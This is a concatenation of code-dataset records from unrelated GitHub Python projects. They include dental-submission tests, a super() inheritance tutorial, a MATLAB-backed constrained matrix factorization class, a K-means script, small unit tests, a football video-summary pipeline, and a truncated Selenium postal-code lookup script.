self.cmd.filter_for_new_or_failed_since(\n Episode.objects.all()\n )\n self.assertEqual(\n result, [self.fp17_episode]\n )\n\n def test_return_episodes_with_no_submissions(self):\n self.fp17_episode.fp17incompletetreatment_set.update(\n completion_or_last_visit=self.this_year\n )\n result = self.cmd.filter_for_new_or_failed_since(\n Episode.objects.all()\n )\n self.assertEqual(\n result, [self.fp17_episode]\n )\n\n def test_do_not_return_old_episodes(self):\n self.fp17_episode.fp17incompletetreatment_set.update(\n completion_or_last_visit=self.last_year\n )\n self.fp17_episode.submission_set.create(\n state=models.Submission.REJECTED_BY_COMPASS\n )\n result = self.cmd.filter_for_new_or_failed_since(\n Episode.objects.all()\n )\n self.assertEqual(\n result, []\n )\n\n def test_do_not_return_episodes_already_succeeded(self):\n self.fp17_episode.fp17incompletetreatment_set.update(\n completion_or_last_visit=self.this_year\n )\n self.fp17_episode.submission_set.create(\n state=models.Submission.SUCCESS\n )\n result = self.cmd.filter_for_new_or_failed_since(\n Episode.objects.all()\n )\n self.assertEqual(\n result, []\n )\n\n def test_with_fp17o(self):\n fp17o_episode = self.patient.create_episode()\n fp17o_episode.stage = FP17OEpisode.SUBMITTED\n fp17o_episode.category_name = FP17OEpisode.display_name\n fp17o_episode.save()\n fp17o_episode.orthodonticassessment_set.update(\n date_of_assessment=self.this_year\n )\n result = self.cmd.filter_for_new_or_failed_since(\n Episode.objects.filter(category_name=FP17OEpisode.display_name)\n )\n self.assertEqual(\n result, [fp17o_episode]\n )\n\n def test_with_none(self):\n result = self.cmd.filter_for_new_or_failed_since(\n Episode.objects.none()\n )\n self.assertEqual(\n result, []\n )\n","repo_name":"odonto/odonto","sub_path":"odonto/odonto_submissions/tests/test_send_submissions.py","file_name":"test_send_submissions.py","file_ext":"py","file_size_in_byte":8312,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"54"} +{"seq_id":"40406773840","text":"### super()函数 继承,调用父类的方法\r\n\r\n# 父类\r\nclass Person():\r\n def speak(self):\r\n print('i can speak')\r\n\r\n def sing(self):\r\n print('i can sing')\r\n\r\n def rap(self):\r\n print('i can rap')\r\n\r\n def basketball(self):\r\n print('i can basketball')\r\n\r\n\r\n# 继承\r\nclass Student(Person):\r\n pass\r\n\r\nclass Student1(Person):\r\n def study(self):\r\n print('i like study')\r\n\r\nif __name__ == '__main__':\r\n # 实例化一个Student对象\r\n s = Student()\r\n s.rap()\r\n s.basketball()\r\n\r\n s1 = Student1()\r\n s1.rap()\r\n s1.study()\r\n \r\n# 调用 super().父类方法\r\nclass A:\r\n def get_name(self):\r\n return 'my name is xiaoming'\r\n\r\nclass B(A):\r\n def my_info(self):\r\n print('i am 18 years old')\r\n # 调用父类A中的get_name函数\r\n print(super().get_name())\r\n print('i like rap and basketball')\r\n\r\nif __name__ == '__main__':\r\n b = B()\r\n \r\n \"\"\"\r\n i am 18 years old\r\n my name is xiaoming\r\n i like rap and basketball\r\n \"\"\"\r\n b.my_info()\r\n\r\n## 多继承 \r\nclass A:\r\n num = 1\r\n def method(self):\r\n print('A ..method')\r\n\r\nclass B:\r\n num = 2\r\n def method(self):\r\n print('B ..method')\r\n \r\nclass C(A, B):\r\n num = 3\r\n pass\r\n\r\nif __name__ == '__main__':\r\n c = C()\r\n #print(C.__mro__) # 优先查找顺序C> A> B \r\n print(c.num) # 3\r\n c.method() # A ..method\r\n\r\n","repo_name":"jamincen/Python3X_Daily_question","sub_path":"7_super.py","file_name":"7_super.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"18752238872","text":"#!/usr/bin/env python\r\nimport sys\r\nimport collections\r\nimport pprint as pp\r\nimport copy\r\nfrom datetime import *\r\nsys.path.insert(0, \"/home/dehajjik/workspace/src/utils\")\r\nfrom categorized_data_utils import *\r\nfrom json_utils import JsonUtils\r\nfrom date_time_utils import DateTimeUtils\r\nfrom numpy_utils import Numpy\r\nimport math\r\nimport numpy as np\r\nfrom datetime import datetime, timedelta\r\nimport scipy.io\r\nimport shutil\r\nimport subprocess\r\n\r\n\r\n\r\n\r\n'''\r\nLCBMFComputer stands for Linearly Constrained Bayesian Matrix Factorization.\r\n\r\nIt is a factorization matrix method that enable the user to specify constrains (linear constrains) on the resulted factor matrices desired.\r\n\r\nGiven a matrix X of size (m,n) and a dimensionality reduction parameter k, it finds two matrices A (m*k)and B(n*j) such that:\r\n\t- |X- A.B| <= sigma where sigma is very small\r\n\t- the elements of A (lets call them ai) verify the linear constrains indicated : coef1*ai-biais1 = 0 and coef2*ai-biais2>=0\r\n\t- the elements of B (lets call them bj) verify the linear constrains indicated : coef3*bj-biais3 = 0 and coef4*bj-biais4>=0\r\n'''\r\nclass LCBMFComputer (object):\r\n\ttemp_dir = \"/speech/dbwork/mul/students/dehajjik/tmp_matrix_data/\"\r\n\tx_matrix_mlab_name = \"x_mat\"\r\n\ta_constrains_mlab_name = \"a_cons\"\r\n\tb_constrains_mlab_name = \"b_cons\"\r\n\t\r\n\ta_matrix_mlab_name = \"a_mat\"\r\n\tb_matrix_mlab_name = \"b_mat\"\r\n\t\r\n\tmlab_ext = \".mat\"\r\n\t\r\n\tequality_key=\"eq\" \r\n\tinequality_key=\"ineq\"\r\n\tcoefs_key=\"coef\"\r\n\tbiais_key=\"biais\"\r\n\t\r\n\tmlab_lcbmf_dir_path = \"/home/dehajjik/workspace/src_mlab/lcbmf/\"\r\n\t\r\n\tshell_script_path = \"/home/dehajjik/workspace/src/data_analysis/linearly_constrained_basyesian_mf/launch_mlab_lcbmf.sh\"\r\n\t\r\n\t#the matlab function takes as input arguments path_to_matrix, path_to_a_constrains, path_to_b_constrains\r\n\tmlab_lcbmf_function_name = \"compute_lcbmf\"\r\n\t\r\n\t\r\n\t\r\n\tk_label = \"k\"\r\n\ttime_dimention = 1\r\n\tfeature_dimention = 0\r\n\t\r\n\tfeature_display_size = 20\r\n\t\r\n\t'''\r\n\tpossible values for:\r\n\t\tpretransformation_name : {\"none\" ,\"idf\", \"ldc\",\"idc\",\"idf3\", None}\r\n\t\ta_constrains_name : { \"[0,1]\", None}\r\n\t\tb_constrains_name : {\"positive, sum=1\", None}\r\n\t'''\r\n\tdef __init__(self, matrix, pretransformation_name, a_constrains_name, b_constrains_name, k):\r\n\t\tself.x_matrix_data = matrix\r\n\t\t\r\n\t\t\r\n\t\t#initialize the name of the different transformations and constranis for the lcbmf\r\n\t\tself.pretransformation_name = pretransformation_name\r\n\t\tself.a_constrains_name = a_constrains_name\r\n\t\tself.b_constrains_name = b_constrains_name\r\n\t\t\r\n\t\t\r\n\t\tself.k = 5\r\n\t\t\r\n\t\tif k!= None:\r\n\t\t\tself.k = k\r\n\t\t\r\n\t\t\r\n\t\t'''\r\n\t\tThe constrains of a is a dict that contains the 4 different keys representing the 4 different constrains to specify:\r\n\t\t\t-coefs for the equality of a\r\n\t\t\t-biais for the equality of a\r\n\t\t\t-coefs for the inequality of a\r\n\t\t\t-biais for the inequality of a\r\n\t\t'''\r\n\t\tself.a_constrains = {LCBMFComputer.equality_key+LCBMFComputer.coefs_key : [],\r\n\t\t\t\t\t\t\tLCBMFComputer.equality_key+LCBMFComputer.biais_key : [],\r\n\t\t\t\t\t\t\tLCBMFComputer.inequality_key+LCBMFComputer.coefs_key : [],\r\n\t\t\t\t\t\t\tLCBMFComputer.inequality_key+LCBMFComputer.biais_key : []\r\n\t\t\t\t\t\t\t}\r\n\t\t\r\n\t\t\r\n\t\t'''\r\n\t\tSame for b constrains\r\n\t\t'''\r\n\t\tself.b_constrains = {LCBMFComputer.equality_key+LCBMFComputer.coefs_key : [],\r\n\t\t\t\t\t\t\tLCBMFComputer.equality_key+LCBMFComputer.biais_key : [],\r\n\t\t\t\t\t\t\tLCBMFComputer.inequality_key+LCBMFComputer.coefs_key : [],\r\n\t\t\t\t\t\t\tLCBMFComputer.inequality_key+LCBMFComputer.biais_key : []\r\n\t\t\t\t\t\t\t}\r\n\t\t\r\n\t\tself.a_matrix = None\r\n\t\tself.b_matrix = None\r\n\t\t\r\n\t\tself.rows_interpretable_output = {}\r\n\t\t\r\n\t\t\r\n\tdef compute(self):\r\n\t\t#make transformation if needed\r\n\t\t[transformed_matrix, transformation_scores_by_feature] = self._apply_pretransformation(self.x_matrix_data, self.pretransformation_name)\r\n\t\t\r\n\t\t#define the constrains\r\n\t\tself._define_constrains(self.a_constrains_name, self.b_constrains_name)\r\n\t\t\r\n\t\t\r\n\t\t#defining the paths of the different elements\r\n\t\tx_mat_path = LCBMFComputer.temp_dir+LCBMFComputer.x_matrix_mlab_name+LCBMFComputer.mlab_ext\r\n\t\ta_cons_path = LCBMFComputer.temp_dir+LCBMFComputer.a_constrains_mlab_name+LCBMFComputer.mlab_ext\r\n\t\tb_cons_path = LCBMFComputer.temp_dir+LCBMFComputer.b_constrains_mlab_name+LCBMFComputer.mlab_ext\r\n\t\ta_mat_path= LCBMFComputer.temp_dir+LCBMFComputer.a_matrix_mlab_name+LCBMFComputer.mlab_ext\r\n\t\tb_mat_path = LCBMFComputer.temp_dir+LCBMFComputer.b_matrix_mlab_name+LCBMFComputer.mlab_ext\r\n\t\t\r\n\t\t#write the matrix in the temp dir with a matlab extention\r\n\t\tself._create_dir(LCBMFComputer.temp_dir)\r\n\t\tself._write_in_mlab_format({LCBMFComputer.x_matrix_mlab_name:transformed_matrix}, x_mat_path)\r\n\t\tself._write_in_mlab_format(self.a_constrains, a_cons_path)\r\n\t\tself._write_in_mlab_format(self.b_constrains, b_cons_path)\r\n\t\t\r\n\t\t\r\n\t\t#execute the matlab code\r\n\t\tsubprocess.call([LCBMFComputer.shell_script_path, LCBMFComputer.mlab_lcbmf_dir_path,x_mat_path, LCBMFComputer.x_matrix_mlab_name, a_cons_path, b_cons_path, LCBMFComputer.equality_key, \r\n\t\t\t\t\t\tLCBMFComputer.inequality_key, LCBMFComputer.coefs_key, LCBMFComputer.biais_key, str(self.k), a_mat_path, b_mat_path])\r\n\t\t\r\n\t\t#read the results given by matlab from the temp dir\r\n\t\t\r\n\t\tself.a_matrix = self._load_mlab_format_unique_var(a_mat_path)\r\n\t\tself.b_matrix = self._load_mlab_format_unique_var(b_mat_path)\r\n\t\t\r\n\t\r\n\t\t\r\n\t\t#rempve the temp dir\r\n\t\tself._remove_dir(LCBMFComputer.temp_dir)\r\n\t\t\r\n\t\treturn [self.a_matrix, self.b_matrix]\r\n\t\t\r\n\t\t\r\n\tdef _apply_pretransformation(self, matrix, pretransformation_name):\r\n\t\ttransformed_trainset = np.copy(matrix)\r\n\t\t\r\n\t\t\r\n\t\tif pretransformation_name == \"none\" or pretransformation_name == None:\r\n\t\t\t#initialize the transformation scores to an array of the size of the number of features and containing all ones. This is equivalent to not having made any transformation\r\n\t\t\ttransformation_scores_by_feature = np.ones(np.shape(matrix)[LCBMFComputer.feature_dimention])\r\n\t\t\r\n\t\telif pretransformation_name == \"idf\":\r\n\t\t\tdo_laplace_smoothing = True\r\n\t\t\t[transformed_trainset, transformation_scores_by_feature] = Numpy.idf_matrix_transformation(matrix, LCBMFComputer.time_dimention, do_laplace_smoothing)\r\n\t\t\r\n\t\telif pretransformation_name == \"ldc\":\r\n\t\t\t[transformed_trainset, transformation_scores_by_feature] = Numpy.ldc_matrix_transformation(matrix, LCBMFComputer.time_dimention)\r\n\t\t\r\n\t\telif pretransformation_name == \"idc\":\r\n\t\t\tdo_laplace_smoothing = True\r\n\t\t\t[transformed_trainset, transformation_scores_by_feature] = Numpy.idc_matrix_transformation(matrix, LCBMFComputer.time_dimention, do_laplace_smoothing)\r\n\t\t\r\n\t\telif pretransformation_name == \"idf3\":\r\n\t\t\tdo_laplace_smoothing = True\r\n\t\t\t[transformed_trainset, transformation_scores_by_feature] = Numpy.idf3_matrix_transformation(matrix, LCBMFComputer.time_dimention, do_laplace_smoothing)\r\n\t\t\r\n\t\telse:\r\n\t\t\traise Exception(\"WRONG TRANSFORMATION EXCEPTION : the transformation \"+pretransformation_name+\" do not exist\")\r\n\t\t\t\r\n\t\treturn [transformed_trainset, transformation_scores_by_feature]\r\n\t\r\n\r\n\t'''\r\n\tfunctions dealing with the constrains of a and b are defined below\r\n\t'''\r\n\tdef _define_constrains(self, a_constrains_name, b_constrains_name):\r\n\t\tself._define_a_constrains(a_constrains_name)\r\n\t\tself._define_b_constrains(b_constrains_name)\r\n\r\n\t\t\r\n\tdef _define_a_constrains(self, constrains_name):\r\n\t\tif constrains_name == \"[0,1]\" or constrains_name == None:\r\n\t\t\tself._a_between_zero_and_one()\r\n\t\telse:\r\n\t\t\traise Exception(\"WRONG TRANSFORMATION EXCEPTION : the constrains \"+constrains_name+\" do not exist\")\r\n\t\r\n\tdef _a_between_zero_and_one(self):\r\n\t\t'''\r\n\t\tfor a_constrains we want the following:\r\n\t\t\t0<=ai<=1 this is equvalent to:\r\n\t\t\t\tai>=0 and ----------------------> identify_matrix(k)*[a1,...,ak]T - [0,.....0]T >= [0,....,0]T \r\n\t\t\t\t-ai+1>=1 ----------------------> -identify_matrix(k)*[a1,...,ak]T - [-1,.....,-1]T >= [0,....,0]T\r\n\t\t\r\n\t\tNote here that each ai represents a topic (a column) -> ai goes from 0 to k-1\r\n\t\t'''\r\n\t\ta_ineq_coef = np.concatenate((np.identity(self.k),-np.identity(self.k)),0)\r\n\t\ta_ineq_biais = np.concatenate((np.zeros((self.k,1)), -np.ones((self.k,1))),0)\r\n\t\t\r\n\t\t#no equalities for a\r\n\t\tself.a_constrains = {LCBMFComputer.equality_key+LCBMFComputer.coefs_key : [],\r\n\t\t\t\t\t\t\tLCBMFComputer.equality_key+LCBMFComputer.biais_key : [],\r\n\t\t\t\t\t\t\tLCBMFComputer.inequality_key+LCBMFComputer.coefs_key : a_ineq_coef,\r\n\t\t\t\t\t\t\tLCBMFComputer.inequality_key+LCBMFComputer.biais_key : a_ineq_biais\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\r\n\tdef _define_b_constrains(self, constrains_name):\r\n\t\tif constrains_name == \"positive, sum=1\" or constrains_name == None:\r\n\t\t\tself._b_positive_sum_to_one()\r\n\t\telse:\r\n\t\t\traise Exception(\"WRONG TRANSFORMATION EXCEPTION : the constrains \"+constrains_name+\" do not exist\")\r\n\t\r\n\tdef _b_positive_sum_to_one(self):\r\n\t\t'''\r\n\t\tfor b_constrains we want the following:\r\n\t\t1- bi >= 0-----------------------------------> identify_matrix(k)*[b1,...,bk]T - [0,.....0]T >= [0,....,0]T\r\n\t\t2- Sum bi = 1 ------------------------------> [1,.......,1] * [b1,...,bk]T -1 = 0\r\n\t\t'''\r\n\t\tb_ineq_coef = np.identity(self.k)\r\n\t\tb_ineq_biais = np.zeros((self.k,1))\r\n\t\t\r\n\t\tb_eq_coef = np.ones((1,self.k))\r\n\t\tb_eq_biais = 1\r\n\t\t\r\n\t\tself.b_constrains = {LCBMFComputer.equality_key+LCBMFComputer.coefs_key : b_eq_coef,\r\n\t\t\t\t\t\t\tLCBMFComputer.equality_key+LCBMFComputer.biais_key : b_eq_biais,\r\n\t\t\t\t\t\t\tLCBMFComputer.inequality_key+LCBMFComputer.coefs_key : b_ineq_coef,\r\n\t\t\t\t\t\t\tLCBMFComputer.inequality_key+LCBMFComputer.biais_key : b_ineq_biais\r\n\t\t\t\t\t\t\t}\r\n\r\n\t'''\r\n\tCall this method to construct a humanely readable clusters result. They are represented as a dictionary stored in the class attribute rows_interpretable_output\r\n\tfrom the realization and the id_info returns the label of this realization \r\n\tnb_features_display: for each concept the number of features to display\r\n\t'''\r\n\tdef construct_rows_interpretable_output(self, row_labels, nb_features_display):\r\n\t\t#built the interpretable output as a dictionary\r\n\t\tself.rows_interpretable_output[LCBMFComputer.k_label] = {}\r\n\t\tnb_concepts = self.k\r\n\t\tu = self.a_matrix\r\n\t\t\r\n\t\tb_sums = np.sum(self.b_matrix,1)\r\n\t\tb_norm = b_sums/(np.sum(b_sums,0)*1.0)\r\n\t\t\r\n\t\tfor k in range(0, nb_concepts):\r\n\t\t\tkth_key = str(k)+\" : \"+str(b_norm[k])\r\n\t\t\tself.rows_interpretable_output[self.k_label][kth_key]={}\r\n\t\t\tkth_output={}\r\n\t\t\tkth_vector = u[:,k]\r\n\t\t\t\r\n\t\t\tnb_rows = None\r\n\t\t\tif np.size(kth_vector) == len(row_labels):\r\n\t\t\t\tnb_rows = np.size(kth_vector)\r\n\t\t\telse:\r\n\t\t\t\traise Exception(\"NON MATCHING LENGTHS EXCEPTIONS: the columns vector has size \"+size(kth_vector)+\" whereas the corresponding number of labels is \"+len(row_labels))\r\n\t\t\t\t\r\n\t\t\t\r\n\t\t\tfor m in range(0, nb_rows):\r\n\t\t\t\tkth_output[row_labels[m]] = kth_vector[m]\r\n\t\t\t\t\r\n\t\t\t\r\n\t\t\tkth_output = collections.OrderedDict(sorted(kth_output.items(), key=lambda item: abs(item[1]), reverse= True)[0:nb_features_display]) \r\n\t\t\tself.rows_interpretable_output[self.k_label][kth_key] = kth_output\r\n\t\t\t\r\n\t\t\tself.rows_interpretable_output[self.k_label] = collections.OrderedDict(sorted(self.rows_interpretable_output[self.k_label].items(), key=lambda item: int(item[0].split(\" : \")[0]))) \r\n\t\t\t\r\n\t'''\r\n\tI/O functions defined below\r\n\t'''\r\n\tdef _write_in_mlab_format(self, numpy_object, key, path):\r\n\t\tscipy.io.savemat(path, {key:numpy_object})\r\n\t\t\r\n\tdef _write_in_mlab_format(self, var_object_dict, path):\r\n\t\tscipy.io.savemat(path, var_object_dict)\r\n\t\r\n\tdef _load_mlab_format_unique_var(self, path):\r\n\t\t#environment_var are variables added automatically by matlab so we filter them\r\n\t\tenvironment_var = ['__version__', '__header__', '__globals__']\r\n\t\tdict = scipy.io.loadmat(path)\r\n\t\tfor key in dict.keys():\r\n\t\t\tif key not in environment_var:\r\n\t\t\t\treturn dict[key]\r\n\t\r\n\t\r\n\tdef _remove_dir(self, path):\r\n\t\tshutil.rmtree(path)\r\n\t\t\r\n\tdef _create_dir(self, dir_path):\r\n\t\tif not os.path.exists(dir_path):\r\n\t\t\tos.makedirs(dir_path)","repo_name":"khalilhajji/discovering_user_habbits_from_smartphone_logs","sub_path":"external_attachements/src/data_analysis/linearly_constrained_basyesian_mf/lcbmf_computer.py","file_name":"lcbmf_computer.py","file_ext":"py","file_size_in_byte":11833,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"35733436911","text":"import math\r\nimport numpy as np\r\n\r\n# the hyperparameter for K-Means Algorithm\r\nk = 3\r\n\r\n# hardcoded problem data\r\ninst = np.array([\r\n [0.25, 0.50],\r\n [0.50, 0.35],\r\n [0.25, 0.50],\r\n [1.00, 0.35],\r\n [1.40, 0.70],\r\n [0.50, 0.85],\r\n [0.25, 1.00],\r\n [0.75, 1.00],\r\n [0.35, 1.25],\r\n [0.85, 1.25],\r\n [3.25, 0.50],\r\n [3.50, 0.35],\r\n [3.00, 1.00],\r\n [3.25, 0.85],\r\n [3.45, 0.85],\r\n [3.75, 0.85],\r\n [3.25, 1.10],\r\n [3.00, 3.25],\r\n [3.25, 3.00],\r\n [3.10, 3.50],\r\n [1.00, 2.50],\r\n [1.20, 2.40],\r\n [1.25, 2.50],\r\n [1.50, 2.50],\r\n [0.65, 2.75],\r\n [1.20, 2.75],\r\n [1.37, 2.75],\r\n [1.00, 3.00],\r\n [1.10, 3.20],\r\n [0.85, 3.35],\r\n])\r\n\r\n\r\ndef dist(p1, p2):\r\n return math.sqrt(pow(p1[0] - p2[0], 2) + pow(p1[1] - p2[1], 2))\r\n\r\n\r\ndef column(matrix, i):\r\n return [row[i] for row in matrix]\r\n\r\n\r\ndef getmincol(mat, col):\r\n poz = 0\r\n minim = np.inf\r\n for i in range(mat.shape[0]):\r\n if minim > mat[i][col]:\r\n minim = mat[i][col]\r\n poz = i\r\n return poz\r\n\r\n\r\n# the algorithm--------------------------------------------------------------------------------------------------------------------------------------------------------\r\n\r\n# the centroids are randomly generating, acording to given instances of training\r\ncentr = np.random.randn(k, 2)\r\nnewcentr = np.zeros((k, 3))\r\n\r\n#the clusters are computed as the new iteration begins\r\nnewclus = [0] * inst.shape[0]\r\nD = np.zeros((k, inst.shape[0]))\r\nold_clus = [-1] * inst.shape[0]\r\nclus = newclus\r\nold_centr = np.random.randn(k, 2)\r\n\r\nwhile old_clus != clus and not np.array_equal(old_centr,centr):\r\n newcentr = np.zeros((k, 3))\r\n # computing distance matrix\r\n for i in range(k):\r\n for j in range(inst.shape[0]):\r\n D[i][j] = dist(inst[j], centr[i])\r\n\r\n # computing the clusters with euclidian distance\r\n\r\n old_clus = clus.copy()\r\n for i in range(inst.shape[0]):\r\n clus[i] = getmincol(D, i)\r\n newcentr[clus[i]][2] =+ 1\r\n newcentr[clus[i]][0] =+ inst[i][0]\r\n newcentr[clus[i]][1] =+ inst[i][1]\r\n\r\n old_centr = centr.copy()\r\n # the centroid is relocated in the middle of the cluster\r\n for i in range(k):\r\n if newcentr[i][2] != 0:\r\n centr[i][0] = newcentr[i][0] / newcentr[i][2]\r\n centr[i][1] = newcentr[i][1] / newcentr[i][2]\r\n\r\n print(centr)\r\n print(clus)","repo_name":"CarolRameder/K-Means","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"10217850726","text":"import pandas as pd\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n\n# ベクトル化する文字列\nsample = np.array(['Apple computer of the apple mark',\n 'linux computer', 'windows computer'])\n\n# TfidfVectorizer\nvec_tfidf = TfidfVectorizer()\n\n# ベクトル化\nX = vec_tfidf.fit_transform(sample)\n\nprint('Vocabulary size: {}'.format(len(vec_tfidf.vocabulary_)))\nprint('Vocabulary content: {}'.format(vec_tfidf.vocabulary_))\n\n\n\n\ndef predict(self, body, body_plain=None):\n '''\n @param str body: 分かち書きしたものを渡すこと\n @return dict\n '''\n\n if body_plain:\n # ビジネスルールの適用\n # msgの場合は分かち書きする前に適用する\n bf = BizFilter()\n res_bf = bf.work(body_plain)\n\n if res_bf:\n return {\n 'predict': 1,\n 'score': app.config['SCORE_THRESHOLD_WORK_SPAM'] + 1.0,\n 'vocabulary': res_bf['keyword']\n }\n\n # TFIDFはiterableな値しか受けつけないので、リストで渡す\n tfidf = app.config['vect'].transform([body])\n lsa_reduced = app.config['lsa'].transform(tfidf)\n predict = app.config['clf'].predict(lsa_reduced)\n\n score = self._get_score(app.config['clf'], lsa_reduced)\n\n vocabulary = self._get_vocabulary(app.config['vect'], tfidf)\n","repo_name":"0xb5951/shipment_title_generator","sub_path":"extract_title.py","file_name":"extract_title.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"39807326112","text":"import pytest\nfrom sqlconstructor import SqlQuery, SqlSection\n\n\n@pytest.mark.SqlQuery\n@pytest.mark.SqlSection\ndef test_getitem_by_slice():\n a = SqlQuery()\n a['select'](\n 'id',\n 'name',\n )\n a['from']('product')\n a['where']('quantity > 0')\n assert len(a) == 3\n b = a[:-1]\n assert b is not a\n assert len(b) == 2\n iter_of_a = iter(a)\n iter_of_b = iter(b)\n for _ in range(2):\n assert next(iter_of_a) is next(iter_of_b)\n assert str(b()) == '\\n'.join(\n (\n 'SELECT',\n ' id,',\n ' name',\n 'FROM',\n ' product'\n )\n )\n","repo_name":"akvilary/sqlconstructor","sub_path":"tests/test_sql_query/test_getitem_by_slice.py","file_name":"test_getitem_by_slice.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"36807790560","text":"import matplotlib.pyplot as plt\n\nclass PlotDataController():\n\n def get_lines(self):\n return []\n\n def add_data(self, labels, data, label, style):\n if style == \"lines\":\n self.ax.plot(labels, data, label=label)\n elif style == \"real\":\n self.ax.plot(labels, data, 'k-', label=label)\n elif style == \"dots\":\n self.ax.scatter(labels, data, label=label)\n elif style == \"bars\":\n self.ax.bar(labels, data, label=label)\n\n def prepare(self, ax):\n pass\n\n\n def adjust(self, fig, ax):\n adjust={}\n adjust['left'] = .08\n adjust['bottom'] = .1\n adjust['right'] = .996\n adjust['top'] = .988\n adjust['wspace'] = 0.16\n adjust['hspace'] = .178\n \n fig.tight_layout()\n \n plt.subplots_adjust(**adjust)\n\n def plot(self, x, y, style):\n fig, ax = plt.subplots()\n self.ax = ax\n\n self.prepare(x, y, style)\n\n if x == 'estimator':\n self.ax.set_xlabel('Estimator parameter')\n if x == 'samples':\n self.ax.set_ylabel('Samples')\n\n if y == 'result':\n self.ax.set_ylabel('Calculated entropy')\n if y == 'score':\n self.ax.set_ylabel('Score')\n\n ax.legend()\n self.adjust(fig, ax)\n\n plt.show()\n\n self.ax = None\n\n \n","repo_name":"eduardoHoefel/dear-tool","sub_path":"gui/objects/plot/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":1364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"28512196338","text":"import unittest\n\nimport pandas as pd\n\n# Alexander imports\nfrom sys import path\nfrom os.path import dirname as dir\npath.append(dir(path[0]))\n\nimport preprocessing\n \nclass TestPreprocessing(unittest.TestCase):\n \n def setUp(self):\n pass\n\n def test_label_encoder(self):\n \"\"\"Test that LabelEncoder works as intended for a normal case.\"\"\"\n encoder = preprocessing.LabelEncoder()\n data = [{'Sex': 'Male'},{'Sex': 'Female'}]\n df = pd.DataFrame(data)\n new_df = encoder.fit_transform(df)\n expected_data = [{'Sex': 1},{'Sex': 0}]\n self.assertEqual(new_df.to_dict('records'), expected_data)\n \n def test_label_encoder_encodings(self):\n \"\"\"Test that attribute 'encodings' of LabelEncoder is correct.\"\"\"\n encoder = preprocessing.LabelEncoder()\n data = [{'Sex': 'Male'},{'Sex': 'Female'}]\n df = pd.DataFrame(data)\n new_df = encoder.fit(df)\n sorted_a = sorted(encoder.encodings['Sex'])\n sorted_b = sorted(['Male', 'Female'])\n self.assertEqual(sorted_a, sorted_b)\n \nif __name__ == '__main__':\n unittest.main()","repo_name":"alessandrosp/alexander","sub_path":"alexander/tests/test_preprocessing.py","file_name":"test_preprocessing.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"27616873005","text":"\nimport time\nfrom UTL.classes import shot_types, event_types\nfrom ProcessingSteps.Processing_Steps import (STEP_1_shots_processing, STEP_2_resolving_double_logos, STEP_3_audio_processing, STEP_4_processing_output_shots,\nSTEP_5_classifying_shot_sequence, STEP_6_processing_final_output, STEP_7_file_output, STEP_8_rendering_video)\nimport cv2\n\n\ndef main():\n # CONSTANTS _________________________________________________________\n video_name = \"shf_united_vs_burnley_2\"\n VIDEO_PATH = \"shf_united_vs_burnley_2.mp4\"\n cap = cv2.VideoCapture(VIDEO_PATH)\n if cap.isOpened() == False:\n print('err reading video')\n return\n\n SHOT_TYPES = shot_types()\n EVENT_TYPES = event_types()\n\n t1 = time.time()\n\n # shots processing _____________________________________________________\n shots = STEP_1_shots_processing(cap, SHOT_TYPES)\n\n # resolving double logos _____________________________________________\n STEP_2_resolving_double_logos(shots, SHOT_TYPES)\n\n # audio processing _________________________________________________\n # Detecing if shot contains high volume ____________________________\n STEP_3_audio_processing(shots, VIDEO_PATH)\n\n # processing output shots __________________________________________________\n # main shots depending on replay and other shots depending on high volume\n output_video_shots_1, output_video_shots_2 = STEP_4_processing_output_shots(\n shots, SHOT_TYPES)\n\n # classifying shots Sequence _____________________________________________\n shots_classes = STEP_5_classifying_shot_sequence(\n output_video_shots_1, output_video_shots_2, SHOT_TYPES, EVENT_TYPES)\n # Final output ______________________________________________________________\n output_video_shots, final_video = STEP_6_processing_final_output(\n output_video_shots_1, output_video_shots_2, shots_classes, SHOT_TYPES)\n\n t2 = time.time()\n\n # write outputs to file ________________________________________________\n STEP_7_file_output(shots_classes, EVENT_TYPES, video_name,\n shots, output_video_shots, output_video_shots_2, t1, t2)\n\n # rendering video _______________________________________________________\n STEP_8_rendering_video(final_video,VIDEO_PATH, video_name)\n\n\nmain()\n","repo_name":"demhahmed/GP-video-summary","sub_path":"code/MAIN_STEPS.py","file_name":"MAIN_STEPS.py","file_ext":"py","file_size_in_byte":2284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"34573592297","text":"from selenium import webdriver as seleniumOptions\nfrom selenium.webdriver.common.by import By\nimport pyautogui as timeResponse\n\n# get browser that will use.\nbrowser = seleniumOptions.Chrome()\n\n# open url to get the data\nbrowser.get('https://buscacepinter.correios.com.br/app/endereco/index.php')\n\n# wait computer response.\ntimeResponse.sleep(2)\n\n# find element name to write CPF.\nbrowser.find_element(By.NAME, 'endereco').send_keys('06764040')\n\n# wait computer response.\ntimeResponse.sleep(2)\n\n# press button \"find\".\nbrowser.find_element(By.NAME, 'btn_pesquisar').click()\n\n# wait computer response.\ntimeResponse.sleep(4)\n\n# find xpath from table.\nelementTable = browser.find_element(By.XPATH, '//*[@id=\"resultado-DNEC\"]')\n\nfor tableRow in elementTable.find_elements(By.TAG_NAME, 'tr'):\n address = ''\n for columnTable in tableRow.find_elements(By.TAG_NAME, 'td'):\n address = address + '\\n' + 